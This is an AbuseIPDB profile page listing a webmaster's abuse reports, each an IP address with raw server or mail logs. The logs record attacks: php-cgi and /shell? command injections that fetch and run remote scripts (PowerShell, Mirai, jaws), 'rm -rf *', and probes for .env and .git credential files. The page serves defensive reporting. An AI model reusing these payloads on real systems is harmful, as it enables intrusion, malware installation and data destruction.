User Fox River Dan, the webmaster of foxriver.net, joined AbuseIPDB in June 2021 and has reported 389 IP addresses.
Standing (weight) is good.
ACTIVE USER
WEBMASTER
SUPPORTER
IP | Date | Comment | Categories |
---|---|---|---|
87.120.125.13 |
87.120.125.13 - - [04/Jan/2025:18:24:57 -0600] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?> HTTP/1.1" 401 7899 "-" "Go-http-client/1.1" "(node: 0)"
|
Hacking Exploited Host Web App Attack | |
23.27.51.244 |
87.120.125.13 - - [04/Jan/2025:18:24:57 -0600] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?> HTTP/1.1" 401 7899 "-" "Go-http-client/1.1" "(node: 0)"
|
Hacking Exploited Host Web App Attack | |
216.9.227.143 |
98.159.236.220 - - [30/Dec/2024:19:52:21 -0600] "GET /shell?cd /tmp || cd /run || cd /; wget http://216.9.227.143/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 216.9.227.143 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 216.9.227.143; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf * HTTP/1.1" 401 7899 "-" "KrebsOnSecurity" "(node: 0)"
|
Hacking Exploited Host | |
98.159.236.220 |
98.159.236.220 - - [30/Dec/2024:19:52:21 -0600] "GET /shell?cd /tmp || cd /run || cd /; wget http://216.9.227.143/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 216.9.227.143 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 216.9.227.143; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf * HTTP/1.1" 401 7899 "-" "KrebsOnSecurity" "(node: 0)"
|
Hacking Brute-Force Exploited Host Web App Attack | |
63.141.246.226 | Hacking Web App Attack | ||
198.46.233.239 |
00:45:11 S: Client IP: 198.46.233.239:46838 (198-46-233-239-host.colocrossing.com) Host IP: 50.196.212.73:587
00:45:13 C: helo foxriver.net
00:45:13 S: 250 foxriver.net, Hello 198-46-233-239-host.colocrossing.com, why do you call yourself foxriver.net?
00:45:13 C: mail from: <[email protected]>
00:45:13 S: 530 User not Authenticated.
00:45:13 C: rcpt to: <[email protected]>
00:45:13 S: 503 Need MAIL before RCPT. |
Email Spam Hacking Brute-Force | |
192.210.162.147 |
76.11.185.195 - - [21/Dec/2024:19:23:16 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 401 7899 "-" "r00ts3c-owned-you" "(node: 0)"
|
Hacking Brute-Force Exploited Host | |
76.11.185.195 |
76.11.185.195 - - [21/Dec/2024:19:23:16 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 401 7899 "-" "r00ts3c-owned-you" "(node: 0)"
|
Hacking Brute-Force Exploited Host | |
141.101.105.59 |
141.101.105.59 - - [27/Nov/2024:09:14:29 -0600] "POST /index.php?s=/admin/upload/uploadfile HTTP/1.1" 401 4877 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36" "(node: 0)"
|
Hacking Brute-Force Web App Attack | |
5.181.3.108 |
45596.ip-ptr.tech - - [24/Nov/2024:08:59:14 -0600] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 401 7092 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" "(node: 0)"
|
Hacking Brute-Force Web App Attack | |
136.143.188.248 |
ATTEMPTED SPAM/UBE/UCE
Connection Time: 20241027 13:38:18
Client IP: 136.143.188.248:16502 (sender4-g12-248.zohomail360.com) Host IP: 50.196.212.73:25
13:38:18 S: 220-************** WARNING: FOR AUTHORIZED USE ONLY! **********************
13:38:18 S: 220-* THIS SYSTEM DOES NOT AUTHORIZE THE USE OF ITS PROPRIETARY COMPUTERS *
13:38:18 S: 220-* BULK E-MAIL SENT FROM THE INTERNET. THIS SYSTEM WILL RESTRICT ACCESS *
13:38:19 C: EHLO sender4-g12-248.zohomail360.com
13:38:19 S: 250-foxriver.net, Hello sender4-g12-248.zohomail360.com, pleased to meet you.
13:38:19 C: MAIL FROM:<[email protected]>
13:38:19 S: 250 <[email protected]>... Sender validation pending. Continue.
13:38:19 C: RCPT TO:H*I*D*D*E*N
13:38:19 S: 550 User not a member of domain: H*I*D*D*E*N |
Email Spam | |
136.143.188.242 |
UBE/UCE SPAM SENT TO ADMIN
20241027 13:41:23.003 00000009 calltype : SMTP
20241027 13:41:23.004 00000009 callerid : 136.143.188.242
20241027 13:41:23.005 00000009 state : rcpt
20241027 13:41:23.006 00000009 cip : 136.143.188.242
20241027 13:41:23.007 00000009 cdn : sender4-g12-242.zohomail360.com
20241027 13:41:23.008 00000009 from : [email protected]
20241027 13:41:23.009 00000009 hdn : sender4-g12-242.zohomail360.com
20241027 13:41:23.010 00000009 rcpt : H*I*D*D*E*N |
Email Spam | |
191.242.223.198 |
191-242-223-198.alivenet.com.br - - [19/Oct/2024:18:20:05 -0500] "POST /public/javascript:doWcLoginAction(false); HTTP/1.1" 404 3004 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "(node: 0)"
191-242-223-198.alivenet.com.br - - [19/Oct/2024:18:20:06 -0500] "POST /public/javascript:doWcLoginAction(false); HTTP/1.1" 404 3004 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "(node: 0)" |
Hacking Brute-Force | |
109.176.207.235 |
host-41.232.44.182.tedata.net - - [15/Sep/2024:09:02:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.176.207.235/jaws;sh+/tmp/jaws HTTP/1.1" 401 7131 "-" "Hello, world" "(node: 0)"
|
Hacking Exploited Host | |
41.232.44.182 |
host-41.232.44.182.tedata.net - - [15/Sep/2024:09:02:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.176.207.235/jaws;sh+/tmp/jaws HTTP/1.1" 401 7131 "-" "Hello, world" "(node: 0)"
|
Hacking Exploited Host Web App Attack | |
73.173.68.69 |
c-76-141-146-198.hsd1.il.comcast.net - - [11/Sep/2024:23:18:09 -0500] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F73.173.68.69%2Fmalware%2Fmirai.sh%3B%20sh%20mirai.sh HTTP/1.1" 401 7131 "-" "Criptonize https://pastebin.com/HYC9sVWr" "(node: 0)"
|
Hacking Exploited Host | |
76.141.146.198 |
c-76-141-146-198.hsd1.il.comcast.net - - [11/Sep/2024:23:18:09 -0500] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F73.173.68.69%2Fmalware%2Fmirai.sh%3B%20sh%20mirai.sh HTTP/1.1" 401 7131 "-" "Criptonize https://pastebin.com/HYC9sVWr" "(node: 0)"
|
Hacking Exploited Host Web App Attack | |
45.145.165.64 |
host-197.39.83.176.tedata.net - - [03/Sep/2024:15:03:58 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 401 1749 "-" "Hello, world" "(node: 0)"
|
Exploited Host Web App Attack | |
197.39.83.176 |
host-197.39.83.176.tedata.net - - [03/Sep/2024:15:03:58 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 401 1749 "-" "Hello, world" "(node: 0)"
|
Brute-Force Exploited Host Web App Attack | |
173.239.224.44 |
173.239.224.44 - - [06/Aug/2024:10:05:48 -0500] "POST /_profiler/phpinfo HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.44 - - [06/Aug/2024:10:05:49 -0500] "POST /phpinfo.php HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.44 - - [06/Aug/2024:10:06:03 -0500] "POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.44 - - [06/Aug/2024:10:06:10 -0500] "GET /blog/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.44 - - [06/Aug/2024:10:06:10 -0500] "POST /admin/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 |
Port Scan Hacking Web App Attack | |
173.239.224.43 |
173.239.224.43 - - [06/Aug/2024:10:05:47 -0500] "POST /frontend/web/debug/default/view HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.43 - - [06/Aug/2024:10:06:04 -0500] "GET /.git/credentials HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.43 - - [06/Aug/2024:10:06:06 -0500] "POST /.svn/entries HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.43 - - [06/Aug/2024:10:06:16 -0500] "GET /public/.env HTTP/1.1" 404 8411 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.43 - - [06/Aug/2024:10:06:23 -0500] "POST /sites/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, |
Port Scan Hacking Web App Attack | |
173.239.224.42 |
173.239.224.42 - - [06/Aug/2024:10:06:08 -0500] "POST /wp-admin/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.42 - - [06/Aug/2024:10:06:09 -0500] "POST /vendor/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.42 - - [06/Aug/2024:10:06:13 -0500] "GET /base/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.42 - - [06/Aug/2024:10:06:18 -0500] "POST /lib/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
Port Scan Hacking Web App Attack | |
173.239.224.41 |
173.239.224.41 - - [06/Aug/2024:10:05:46 -0500] "GET /debug/default/view.html HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.41 - - [06/Aug/2024:10:05:50 -0500] "POST /.env.bak HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.41 - - [06/Aug/2024:10:06:06 -0500] "GET /.svn/entries HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.41 - - [06/Aug/2024:10:06:08 -0500] "GET /library/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.41 - - [06/Aug/2024:10:06:09 -0500] "POST /local/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81 |
Port Scan Hacking Web App Attack | |
173.239.224.40 |
173.239.224.40 - - [06/Aug/2024:10:06:04 -0500] "POST /.git/credentials HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.40 - - [06/Aug/2024:10:06:08 -0500] "GET /vendor/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.40 - - [06/Aug/2024:10:06:10 -0500] "POST /api/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.40 - - [06/Aug/2024:10:06:12 -0500] "GET /cgi-bin/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.40 - - [06/Aug/2024:10:06:13 -0500] "GET /src/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.12 |
Port Scan Hacking Web App Attack | |
173.239.224.39 |
173.239.224.39 - - [06/Aug/2024:10:05:44 -0500] "GET / HTTP/1.1" 302 148 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.39 - - [06/Aug/2024:10:05:49 -0500] "POST /phpinfo HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.39 - - [06/Aug/2024:10:06:14 -0500] "POST /base/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.39 - - [06/Aug/2024:10:06:15 -0500] "POST /www/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.39 - - [06/Aug/2024:10:06:22 -0500] "GET /blogs/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
Port Scan Hacking Web App Attack |